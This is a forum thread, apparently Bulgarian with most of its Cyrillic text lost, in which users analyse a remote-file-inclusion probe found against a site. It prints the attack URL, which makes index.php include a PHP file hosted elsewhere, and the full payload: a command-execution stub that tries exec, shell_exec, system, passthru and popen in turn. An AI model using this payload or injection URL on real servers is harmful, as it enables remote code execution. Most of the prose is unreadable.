Results 1 to 12 of 12

Thread: PHP .

Hybrid View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Creative destructor OgiDogi's Avatar
    Join Date: Nov:2002
    Location:
    Posts: 7,601

    PHP .

    - ( ) , . :

    : /index.php?hhTest=http://www.hotelberberys.pl/includes/domit/ips.txt?

    Code:
    <?php
    echo "Mic22";
    $cmd="id";
    $eseguicmd=ex($cmd);
    echo $eseguicmd;
    function ex($cfe){
    $res = '';
    if (!empty($cfe)){
    if(function_exists('exec')){
    @exec($cfe,$res);
    $res = join("\n",$res);
    }
    elseif(function_exists('shell_exec')){
    $res = @shell_exec($cfe);
    }
    elseif(function_exists('system')){
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(function_exists('passthru')){
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
    }
    elseif(@is_resource($f = @popen($cfe,"r"))){
    $res = "";
    while(!@feof($f)) { $res .= @fread($f,1024); }
    @pclose($f);
    }}
    return $res;
    }
    exit;
    : ?

  2. #2
    Registered User
    Join Date: Aug:2006
    Location: Sofia
    Posts: 37
    shell id ( ). id.

  3. #3
    Creative destructor OgiDogi's Avatar
    Join Date: Nov:2002
    Location:
    Posts: 7,601
    Quote Originally Posted by sunless View Post
    shell id ( ). id.
    , "fetch"- (ID) -mail hack/spam. , HTML, PHP, .

  4. #4
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    - '' , , ? , FTP , ? , , , .

  5. #5
    Registered User
    Join Date: Jul:2008
    Location:
    Posts: 1
    $ wget "http://www.hotelberberys.pl/includes/domit/ips.txt"

    ?


  6. #6
    Pesho's Avatar
    Join Date: Nov:2001
    Location: Sofia
    Posts: 5,169
    Quote Originally Posted by OgiDogi View Post
    /index.php?hhTest=http://www.hotelberberys.pl/includes/domit/ips.txt?

    URL , ?

    vulnerable PHP ( ). - @sunless . ( ). , , patch- .., .

  7. #7
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    , , URL- . GET .
    .

    .

    index.php (.. , ) , , eval() include().

  8. #8
    Registered User fly's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 803
    id
    Code:
    $ id
    uid=501(mitkok) gid=20(staff) groups=20(staff),101(com.apple.sharepoint.group.1),98(_lpadmin),81(_appserveradm),79(_appserverusr),80(admin)
    :
    Code:
    Mic22uid=70(_www) gid=70(_www) groups=70(_www)
    Last edited by fly; 15th July 2008 at 02:52.

  9. #9
    White awesomeness z0ne's Avatar
    Join Date: Feb:2002
    Location: o
    Posts: 13,331
    Quote Originally Posted by Avast
    http://www.hotelberberys.pl/includes/domit/ips.txt => / => VBS:Malware-gen
    . Avast! .

  10. #10
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    Quote Originally Posted by z0ne View Post
    . Avast! .
    , Avast VBS

  11. #11
    Registered User fly's Avatar
    Join Date: Jun:2005
    Location:
    Posts: 803
    ""

  12. #12
    Registered User tedych's Avatar
    Join Date: Nov:2003
    Location:
    Posts: 17,654
    "" , .

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

Copyright © 1999-2011 . .
iskamPC.com | mobility.BG | Bloody's Techblog | | 3D Vision Blog |